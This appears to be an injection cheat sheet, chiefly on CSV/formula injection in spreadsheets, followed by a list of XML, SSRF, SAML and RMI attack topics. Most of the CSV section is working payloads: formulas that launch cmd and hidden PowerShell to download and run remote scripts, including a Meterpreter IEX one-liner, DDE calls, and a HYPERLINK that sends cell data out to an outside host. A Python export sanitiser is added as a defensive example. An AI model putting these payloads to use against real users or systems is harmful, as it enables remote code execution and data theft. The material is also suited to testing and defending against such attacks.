Injection
CSV Injection
https://know.bishopfox.com/blog/2018/06/server-side-spreadsheet-injections
https://www.notsosecure.com/data-exfiltration-formula-injection/
PowerShell payload:
=cmd|'/c powershell.exe -w hidden $e=(New-Object System.Net.WebClient).DownloadString("http://bishopfox.com/shell.ps1");
powershell -e $e'!A1
+cmd|'/C echo|set /p="ACQAYwBtAGQAKQAgAHsACgAkAGMAIAA9ACAAaQBlAHgAIAAkAGMAbQBkACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkA" >> C:\ProgramData\activePDF\Temp\a.enc'!A0
-cmd|'/C echo|set /p="ACQAYwBtAGQAKQAgAHsACgAkAGMAIAA9ACAAaQBlAHgAIAAkAGMAbQBkACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkA" >> C:\ProgramData\activePDF\Temp\a.enc'!A0
@cmd|'/C echo|set /p="ACQAYwBtAGQAKQAgAHsACgAkAGMAIAA9ACAAaQBlAHgAIAAkAGMAbQBkACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkA" >> C:\ProgramData\activePDF\Temp\a.enc'!A0
=DDE(server; file; item; mode)
=DDE("cmd";"/C calc";"__DdeLink_60_870516294")
Check Web Responses:
=WEBSERVICE("http://bishopfox.com")
=WEBSERVICE("https://bishopfox.com")
=WEBSERVICE("http://dnstest.bishopfox.com")
=HYPERLINK("http://contextis.co.uk?leak="&A1&A2,"Error: please click for further information")
Newline character
%0A-3+3+cmd|' /C calc'!D2
Meterpreter Shell
=cmd|'/C powershell IEX(wget bit.ly/1X146m3)'!A0
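Mitigation on the export side, as an added example that is not part of the original page: every payload above relies on a cell whose first visible character is =, +, - or @, and the newline variant relies on the field not being quoted. The sketch below prefixes such cells with an apostrophe and quotes every field; the function names, the sample rows and the choice to leave plain numbers such as -3 unprefixed are assumptions of this example.

```python
import csv
import io

TRIGGERS = ("=", "+", "-", "@")  # leading characters used by the payloads above


def is_number(text):
    """True for plain numeric cells such as -3 or +1.5, which stay numeric."""
    try:
        float(text)
        return True
    except ValueError:
        return False


def neutralise_cell(value):
    """Return the cell as text a spreadsheet displays instead of evaluating."""
    text = "" if value is None else str(value)
    # Tabs, CRs and newlines in front of a trigger must not hide it, so the
    # check looks at the first non-whitespace character.
    stripped = text.lstrip()
    if stripped.startswith(TRIGGERS) and not is_number(stripped):
        return "'" + text  # a leading apostrophe marks the cell as literal text
    return text


def export_csv(rows):
    """Serialise rows with every cell neutralised and every field quoted."""
    out = io.StringIO()
    # QUOTE_ALL keeps an embedded newline inside its cell, so it cannot
    # start a new row whose first cell is attacker-controlled.
    writer = csv.writer(out, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralise_cell(cell) for cell in row])
    return out.getvalue()


# Constructed sample rows: user-supplied values in the shapes listed above.
SAMPLE = [
    ["alice", '=HYPERLINK("http://example.invalid?leak="&A1,"click")'],
    ["bob", "\n-3+3+cmd|' /C calc'!D2"],
    ["carol", "-3"],
    ["dave", "@SUM(A1:A2)"],
]

if __name__ == "__main__":
    print(export_csv(SAMPLE))
```

The prefix changes the stored value, so apply it at export time only and keep the database copy unmodified.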
XML Injection
Aid blind XPath injection vulnerabilities
Vulnerable Java web application
XML Schema, DTD, and Entity Attacks
Tool that implements the Golden SAML attack
A New Era of SSRF Exploiting URL Parser in Trending Programming Languages!
Use WSDL files to send SOAP Messages
Java RMI enumeration and attack tool